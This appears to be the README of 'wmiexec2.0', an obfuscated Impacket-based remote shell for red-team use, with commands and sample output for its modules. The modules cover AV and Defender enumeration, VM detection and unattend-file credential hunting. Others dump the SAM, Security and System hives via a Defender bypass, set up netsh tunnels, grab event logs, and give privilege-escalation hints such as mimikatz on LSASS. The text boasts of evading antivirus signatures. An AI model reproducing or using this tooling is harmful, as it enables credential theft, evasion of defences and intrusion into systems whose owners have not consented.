wmiexec2.0
is the samewmiexec
that everyone knows and loves.- This 2.0 version is obfuscated to avoid well known signatures from various AV engines.
- It also has a handful of additional built in modules to help automate some common tasks on Red team engagements.
- This script is under active development and will improve with time.
- If you find an issue or want a specific module throw me a PR.
- Enjoy
- Do not
wget
this file withGitHubs Raw
feature, it will break the Ghost emoji. Git clone the repo and it will all work.
git clone https://github.com/ice-wzl/wmiexec2.git
cd wmiexec2/
pip3 install -r requirements.txt
- Tested on:
#Windows Server 2022 Updated Febuary Defender Sigs
All modules working, no module flags
#Windows 10 Pro Defender Virus + Spyware Definition Version: 1.381.3595.0 2/14/2023
All modules working, no module flags
#Windows 10 Pro Kaspersky Standard App Version 21.8.5.452, Definitions 2/15/23
All modules working, no module flags
#Windows 8 Defender Virus and Spyware Definition Version: 1.383.35.0 2/15/2023
All modules working, no module flags
#Windows 7 Pro Defender Antispyware Definitions: v1.95.191.0 11/18/2010
Reg module not working, no module flags
- To view the help and available modules:
C:\>help
- You can still connect to the remote machine the exact same way.
- You can specify whether you want a
powershell
shell or acmd
shell by adding the flag--shell-type powershell
or--shell-type cmd
- Password auth + NT Hash auth still both apply
python3 wmiexec2.0.py DOMAIN/USERNAME:[email protected] -shell-type powershell
python3 wmiexec2.0.py WORKGROUP/Administrator:'Password123!@#'@10.0.0.4 -shell-type powershell
lcd {path}
change directory on your local machineexit
you should know this onelput {src_file} {dst_file}
upload local file to remote machine pathlget {file}
download remote file to your local machine! {cmd}
execute local system command -->!ls
lists your current directory on your local machine
- Everything else from here and below is additional features added into
wmiexec
to make itwmiexec2.0
cat
- just to make this more unix friendly simply usestype
on the remote machine to view a file....just an alias you can usels
||ls C:\Users
- allows you to view your current target directory. Its executing thedir /a
command so you will see hidden files by default without any other special options
- To see basic target information use this module
π» PS C:\> sysinfo
[*] Target
dockerw-vg85334\administrator
[*] Hostname
DOCKERW-VG85334
[*] Arch:
PROCESSOR_ARCHITECTURE=AMD64
[*] IP Addresses:
Link-local IPv6 Address . . . . . : fe80::f45c:9e14:7b55:d0b2%4(Preferred)
IPv4 Address. . . . . . . . . . . : 20.20.20.21(Preferred)
- View some well known security products running on the target system.
- Enumerates the process list to see if they are running.
π» PS C:\> av
MsMpEng.exe
- Check specific Defender settings
π» PS C:\> defender
[*] Defender Install Location
InstallLocation REG_SZ C:\Program Files\Windows Defender\
[*] Defender Service is Running
[*] Defender Process Exclusions
No Process Exclusions
[*] Defender Path Exclusions
[*] Tamper Protection is Disabled
- Attempts to detect if you are in a virtual machine (So far works for ESXi/VMWare Workstation and QEMU)
- Performs three checks
- Looks for
C:\Program Files\VMWare
- Looks for common running executables in a proccess list
- Pulls the
System Manufactuer
from host
π» PS C:\> vmcheck
[*] Common Processes:
[*] No VM Processes found
C:\Program Files\VMware Not Present
OS Manufacturer: Microsoft Corporation
System Manufacturer: QEMU
[*] Virtual Box Detection
[!] Found VBox Files:
File Not Found
File Not Found
- There are 11 files (that I know of) part of the
unattend
group in Windows that have the potential to have base64 encoded credentials in them. Find them all in one command
π» PS C:\> unattend
[*] Looking for: C:\unattend.txt, C:\unattend.inf
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features
TamperProtection REG_DWORD 0x1
End of search: 1 match(es) found.
[*] Looking for: C:\Windows\sysprep.inf
Nothing Found
[*] Looking for: C:\Windows\sysprep\sysprep.xml, C:\Windows\sysprep\sysprep.inf
Nothing Found
[*] Looking for: C:\Windows\Panther\Unattended.xml, C:\Windows\Panther\Unattend.xml
06/12/2024 04:33 PM 24,206 unattend.xml
[*] Looking for: C:\Windows\Panther\Unattend\Unattend.xml, C:\Windows\Panther\Unattend\Unattended.xml
Nothing Found
[*] Looking for: C:\Windows\System32\Sysprep\unattend.xml, C:\Windows\System32\Sysprep\unattended.xml
Nothing Found
- Save off the
SAM
,Security
andSystem
hives to your local machines. Defender blocks this by default, so I had to find a bypass working as of 6/7/24. Try to not get this signatured, thanks in advance.
- Leverage Windows built in
netsh
tunneling without having to type the whole thing out - See below for usage options
π» PS C:\> showtun
π» PS C:\> addtun 10000 10.0.0.5 443
π» PS C:\> showtun
Listen on ipv4: Connect to ipv4:
Address Port Address Port
--------------- ---------- --------------- ----------
* 10000 10.0.0.5 443
π» PS C:\> deltun 10000
π» PS C:\> showtun
π» PS C:\>
- Download log file of your choice
- Will download any file in
C:\windows\system32\winevt\logs
- Use:
loggrab Security.evtx
π» PS C:\> loggrab Security.evtx
[*] Security.evtx
[*] Downloading C:\\Windows\system32\spool\drivers\color\Security.evtx
1 file(s) copied.
π» PS C:\> !ls
av.py debug.log __pycache__ README.md remoteshell.py requirements.txt Security.evtx survey.conf wmiexec2.py
π» PS C:\>
- This module will enumerate your currently Enabled tokens and attempt to match them with a priv esc
π» PS C:\> tokens
[*] SeImpersonate Enabled:
Juicy-Potato
RougeWinRM
SweetPotato
PrintSpoofer
[*] SeBackupPrivilege Enabled:
https://github.com/Hackplayers/PsCabesha-tools/blob/master/Privesc/Acl-FullControl.ps1
https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug
https://www.youtube.com/watch?v=IfCysW0Od8w&t=2610&ab_channel=IppSec
[*] SeTakeOwnershipPrivilege Enabled:
takeown /f "C:\windows\system32\config\SAM"
icacls "C:\windows\system32\config\SAM" /grant <your_username>:F
[*] SeDebugPrivilege Enabled:
Procdump.exe on LSASS.exe, use mimikatz
- under active development
- Input your own custom commands into
survey.conf
file seperated by a new line, or use the basic one that I have provided - There are two options with this module:
- run module with
survey
which will print out the command you ran plus the output of that command - Or run with
survey save
this will return none of the commands to stdout, but will save all commands run and their output intosurvey.txt
located in your local pwd.
- to run the survey module and save the output to your local station (No stdout)
π» PS C:\> survey save
[*] Saving all output from survey to survey.txt in your local pwd
[*] Starting Survey
[*] Survey Completed
π» PS C:\> !ls
av.py debug.log __pycache__ README.md remoteshell.py requirements.txt Security.evtx survey.conf survey.txt wmiexec2.py
π» PS C:\> !head survey.txt
[*] hostname
DOCKERW-VG85334
[*] whoami
dockerw-vg85334\administrator
[*] whoami /priv
PRIVILEGES INFORMATION
----------------------
π» PS C:\>
π» PS C:\> survey
[*] Starting Survey
[*] hostname
DOCKERW-VG85334
[*] whoami
dockerw-vg85334\administrator
[*] whoami /priv
--snip--
- If you recieve this error:
python3 wmiexec2.py Administrator:'abc123!!!'@172.17.0.2 -shell-type powershell
Impacket v0.11.0 - Copyright 2023 Fortra
[*] SMBv3.0 dialect used
[-] Can't find a valid stringBinding to connect
- This is usually caused when a target system is NAT'ed in some way. A target behind a router, a cloud VPS, or a docker container are three good examples that will cause this error.
- To read more
- fortra/impacket#272
- Find your
dcomrt.py
file (if youpip3 install -r requirements.txt
) it should be under~
find / -type f -name "dcomrt.py" 2>/dev/null
/opt/impacket-0.11.0/build/lib/impacket/dcerpc/v5/dcomrt.py
/opt/impacket-0.11.0/impacket/dcerpc/v5/dcomrt.py
/opt/Responder/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcomrt.py
/home/ubuntu/.local/lib/python3.10/site-packages/impacket/dcerpc/v5/dcomrt.py
- Edit the file
vim /home/ubuntu/.local/lib/python3.10/site-packages/impacket/dcerpc/v5/dcomrt.py
- Find this line
if stringBinding is None:
- Comment out this line right before the above line
#raise Exception('Can\'t find a valid stringBinding to connect')
- Add these two lines instead
stringBinding = 'ncacn_ip_tcp:%s%s' % (self.get_target(), bindingPort)
LOG.info('Can\'t find a valid stringBinding to connect,use default!')
- That should fix the issue!